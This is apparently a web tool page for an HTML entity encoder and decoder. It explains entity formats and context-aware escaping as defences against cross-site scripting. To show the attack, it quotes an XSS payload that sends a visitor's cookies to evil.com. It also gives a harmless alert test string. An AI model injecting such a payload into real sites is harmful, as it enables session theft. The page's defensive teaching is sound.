HTML Entity Encoder / Decoder
Encode special characters to HTML entities or decode entities back to text. Escape < > & " ' for safe display in web pages and XSS prevention. Supports named entities, decimal numeric (&), and hexadecimal numeric (&) formats.
| Char | Named | Decimal | Hex | Description |
|---|---|---|---|---|
| < | < | < | < | Less-than (opens tags) |
| > | > | > | > | Greater-than (closes tags) |
| & | & | & | & | Ampersand (starts entities) |
| " | " | " | " | Double quote (attribute values) |
| ' | ' | ' | ' | Single quote / apostrophe |
| © | © | © | © | Copyright symbol |
| |   |   | Non-breaking space | |
| — | — | — | — | Em dash |
Key Facts
- XSS Prevention: Encoding user input before rendering in HTML is the #1 defense against cross-site scripting (XSS) attacks — OWASP Top 10 vulnerability since 2003
- Five Critical Characters: < > & " ' must always be encoded when displaying user-generated content in HTML. Failing to encode any one can create an XSS vector
- Named Entities: Human-readable format like & < >. About 250 named entities defined in HTML5. Most readable in source code
- Numeric Entities: Decimal (&) or hex (&) using the Unicode code point. Work for any character including emoji. Required when no named entity exists
- Context Matters: HTML entity encoding is for HTML body content. Use URL encoding for URLs (%26), JavaScript escaping for JS strings (\x26), and CSS escaping for stylesheets (\26)
How HTML Entity Encoding Prevents XSS
- The Attack: An attacker enters
<script>document.location='https://evil.com/steal?c='+document.cookie</script>in a form field - Without Encoding: The browser interprets this as executable JavaScript — the user's cookies are stolen
- With Encoding: The < and > are converted to < and > — the browser renders it as harmless visible text
- Server-Side: Always encode on the server before rendering. Client-side encoding alone is insufficient as attackers can bypass it
- Defense in Depth: Combine HTML encoding with Content-Security-Policy headers for maximum protection. See our Security Header Generator
Different Encoding for Different Contexts
- HTML Body: Use HTML entities (< > &). This tool handles this context
- HTML Attributes: Use HTML entities AND always quote attribute values. Unquoted attributes need additional encoding
- URLs: Use percent-encoding (%3C %3E %26). See our URL Encoder/Decoder
- JavaScript: Use JS escaping (\x3C \x3E \x26) or JSON.stringify(). Never inject unescaped data into script blocks
- CSS: Use CSS escaping (\3C \3E \26). Rarely needed but important in dynamic style generation
Frequently Asked Questions
What are HTML entities?
HTML entities are special sequences that represent characters which have meaning in HTML or cannot be typed directly. They start with & and end with ; — for example, < represents < and & represents &. They prevent the browser from interpreting characters as HTML code, instead displaying them as visible text.
Why do I need to encode HTML entities?
Encoding HTML entities prevents cross-site scripting (XSS) attacks by ensuring user-supplied content is displayed as text, not executed as code. If a user enters <script>alert('hacked')</script> and it is not encoded, the browser will execute it as JavaScript. Encoding converts < to < making it display as harmless text.
What is the difference between named and numeric entities?
Named entities use a descriptive word like & for & or © for ©. Numeric entities use the Unicode code point in decimal (&) or hexadecimal (&). All formats render identically in browsers. Named entities are more readable; numeric entities work for any Unicode character.
Which characters must always be encoded?
Five characters must always be encoded when displaying user content: < (<), > (>), & (&), " ("), and ' (' or '). These have special meaning in HTML. Failing to encode any one of them can create cross-site scripting vulnerabilities.
Is HTML entity encoding enough to prevent XSS?
HTML entity encoding is the primary defense for HTML body content, but XSS prevention requires context-aware encoding. Data in URLs needs percent-encoding, JavaScript contexts need JS escaping, and CSS contexts need CSS escaping. Combine encoding with Content-Security-Policy headers for defense in depth.